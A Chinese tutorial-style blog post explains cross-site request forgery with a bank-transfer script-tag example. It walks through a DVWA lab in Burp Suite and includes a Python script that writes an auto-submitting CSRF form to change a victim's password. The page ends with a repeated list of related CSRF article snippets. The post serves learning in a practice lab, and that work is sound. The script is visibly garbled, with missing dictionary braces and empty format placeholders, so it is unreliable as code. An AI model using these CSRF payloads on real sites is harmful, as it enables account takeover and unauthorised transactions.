浅谈csrf漏洞

东京$ 东京$     2022-11-05     441

关键词:

前言:
看完小迪老师的CSRF漏洞讲解。感觉不行
就自己百度学习。这是总结出来的。
 
歌曲:
 
正文:
CSRF与xss和像,但是两个是完全不一样的东西。
xss攻击(跨站脚本攻击)储存型的XSS由攻击者和受害者一同完成。xss详细介绍:点我跳转
 
CSRF(跨站脚本伪造)完全由受害者完成。攻击者不参与其中。CSRF详细介绍:点我跳转
 
CSRF原理:
 
银行转账的数据包:http://jianse.com/zhuanzhang.php?name=lu&email=xxx@qq.com&monet=1000
攻击者的博客:http://www.hack.com/index,php
把这个加入到js里面。<script src="http://jianse.com/zhuanzhang.php?name=lu&email=xxx@qq.com&monet=1000"></script>将这条代码计入到攻击者的博客。如果受害者登录了银行。而Session又没有过期,后而访问了攻击者的博客。当攻击者的博客加载好了js代码。受害者就会打了1000元给攻击者。
 

 

实验:
这里我使用DVWA来做使CSRF漏洞实现。攻击步骤如下:
首先登录DVWA,来到CSRF这里。 注:这里我的防御等级为low

 

启动Burpsuite,设置代理。

 

回到刚刚的页面,输入要更改的密码。burp开启抓包
 

 

抓到的包

 

构造CSRF POC

 

更改所需要的

 

点击Regenerate按钮更新POC,点击Test in browser复制链接

 

点击Copy按钮。复制到浏览器上使用

 

点击按钮实行csrf攻击。

 

从图中我们可以看到密码已经更改,退回登录界面。

 

点击登录

 

从图中我们可以看到,CSRF攻击已经成功实施。
既然如此我们为什么不写一个CSRF脚本呢?
代码如下:
import time
import simplejson as json
def poc():
    url="http://a2fae7a7.ngrok.io/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change"
    headers=\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\'
    values=url.split(\'?\')[-1]
    urltwo=url.split(\'?\')[:-1]
    urltwos="".join(urltwo)
    dumps=
    for line in values.split(\'&\'):
        key,value=line.split(\'=\',1)
        dumps[key]=value
        discts=[i for i in dumps.keys()]
    print(\'原url:\',url)
    print(\'url原带的参数:\',dumps)
    dumps[\'password_new\'] = \'password\'
    dumps[\'password_conf\'] = \'password\'
    valueswto=[g for g in  dumps.values()]
    print(\'url更该后的参数\',dumps)
    print(\'1.burpsuite的POC\')


    user=input(\'请进行你的选择:\')
    if user == \'1\':
        print(\'burpsiuite的POC\')
        burp=open(\'burp.html\',\'w\')
        burp.write(\'<html>\\n\')
        burp.write(\'<body>\\n\')
        burp.write(\'<script>history.pushState("\'\'","\'\'",\'"\'/\'"\')</script>\\n\')
        burp.write(\'<form action="">\\n\'.format(urltwos))
        burp.write(\'<input type="hidden" name="" value=""/>\\n\'.format(discts[0],valueswto[0]))
        burp.write(\'<input type="hidden" name="" value=""/>\\n\'.format(discts[1],valueswto[1]))
        burp.write(\'<input type="hidden" name="" value=""/>\\n\'.format(discts[2],valueswto[2]))
        burp.write(\'<input type="submit" value="Submit CSRF POC"/>\\n\')
        burp.write(\'</form>\\n\')
        burp.write(\'</body>\\n\')
        burp.write(\'</html>\\n\')
        burp.close()
    else:
        print(\'【-】抱歉你没有进行选择,退出ing...\')
        time.sleep(1)
        exit()



poc()

  测试结果如下:

生成的html

打开burp.html

 

 点击按钮

密码更改成功。

有关CSRF的资料:《CSRF原理》

《深入CSRF解析》

《从0开始学CSRF》

 

浅谈csrf攻击方式

一.CSRF是什么?  CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。二.CSRF可以做什么?  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意... 查看详情

浅谈csrf攻击方式

一.CSRF是什么?  CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。二.CSRF可以做什么?  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意... 查看详情

浅谈csrf攻击方式

一.CSRF是什么?  CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。二.CSRF可以做什么?  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意... 查看详情

浅谈csrf攻击方式

一.CSRF是什么?  CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。二.CSRF可以做什么?  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意... 查看详情

浅谈csrf攻击方式

一.CSRF是什么?  CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。二.CSRF可以做什么?  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意... 查看详情

浅谈csrf(代码片段)

一.CSRF是什么?  CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。  CSRFXSS的区别与联系  XSS 利用的是用户对指定网站的信任,CSRF利用的是网站对用户网页浏... 查看详情

浅谈跨域劫持

本篇文章主要讲解一下跨域攻击:Jsonp劫持Flash跨域劫持CORS跨域资源获取Jsonp劫持Jsonp在2016年就出现了,由于造成危害大多就是泄露敏感信息,比如用户信息,token等,远不如SQL注入,命令执行这些漏洞来的彻底,所以总是被人忽... 查看详情

浅谈csrf(代码片段)

CSRF是什么?(CrossSiteRequestForgery,跨站域请求伪造)是一种网络的攻击方式,它在2007年曾被列为互联网20大安全隐患之一,也被称为“OneClickAttack”或者SessionRiding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像... 查看详情

django浅谈csrf(cross-siterequestforgery)跨站请求伪造

一 CSRF是什么二CSRF攻击原理三CSRF攻击防范回到目录一 CSRF是什么CSRF(Cross-siterequestforgery)跨站请求伪造,也被称为“OneClickAttack”或者SessionRiding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚... 查看详情

浅谈csrf(cross-siterequestforgery)跨站请求伪造(写的非常好)

一 CSRF是什么CSRF(Cross-siterequestforgery)跨站请求伪造,也被称为“OneClickAttack”或者SessionRiding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信... 查看详情

csrf漏洞(代码片段)

文章目录什么是CSRF漏洞CSRF原理CSRF特点CSRF漏洞检测防御CSRF攻击:DVWA实例:security:lowsecurity:mediumsecurity:high总结什么是CSRF漏洞CSRF(Cross-siterequestforgery),也被称为:oneclick 查看详情

-csrf漏洞(代码片段)

第五章-CSRF漏洞第一节CSRF原理介绍1.1CSRF漏洞定义​CSRF(Cross-siterequestforery,跨站请求伪造)也被称为OneClickAttack或者SessionRiding,通常缩写为CSRF或者XSRF。XSS与CSRF区别:1、XSS利用站点内的信任用户,盗取Cookie;2、... 查看详情

csrf进阶之打造一个检测csrf漏洞的脚本(代码片段)

前言:还记得之前所学的CSRF漏洞吧。因为没有对表单做好对应的漏洞而造成的CSRF漏洞。学了这个漏洞后逐渐的了解。这个比较鸡助。  代码:importrequests,tqdm,time,os,relogo="""◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇... 查看详情

利用burpsuite检测csrf漏洞

CSRF漏洞的手动判定:修改referer头或直接删除referer头,看在提交表单时,网站是否还是正常响应。下面演示用Burpsuite对CSRF进行鉴定。抓包。成功修改密码完成漏洞的利用。 查看详情

-csrf漏洞(代码片段)

第五章-CSRF漏洞第一节CSRF原理介绍1.1CSRF漏洞定义​CSRF(Cross-siterequestforery,跨站请求伪造)也被称为OneClickAttack或者SessionRiding,通常缩写为CSRF或者XSRF。XSS与CSRF区别:1、XSS利用站点内的信任用户,盗取Cookie;2、... 查看详情

csrf漏洞(代码片段)

目录一、简介与原理二、简单攻击方式 通过GET方式实现CSRF攻击通过POST请求实现CSRF攻击三、与XSS以及SSRF的区别四、相关检测方法五、相关预防与修复方案用户侧开发侧一、简介与原理        CSRF(Cross-SiteRequestForgeryÿ... 查看详情

csrf漏洞(代码片段)

目录一、简介与原理二、简单攻击方式 通过GET方式实现CSRF攻击通过POST请求实现CSRF攻击三、与XSS以及SSRF的区别四、相关检测方法五、相关预防与修复方案用户侧开发侧一、简介与原理        CSRF(Cross-SiteRequestForgeryÿ... 查看详情

csrf漏洞(代码片段)

目录一、简介与原理二、简单攻击方式 通过GET方式实现CSRF攻击通过POST请求实现CSRF攻击三、与XSS以及SSRF的区别四、相关检测方法五、相关预防与修复方案用户侧开发侧一、简介与原理        CSRF(Cross-SiteRequestForgeryÿ... 查看详情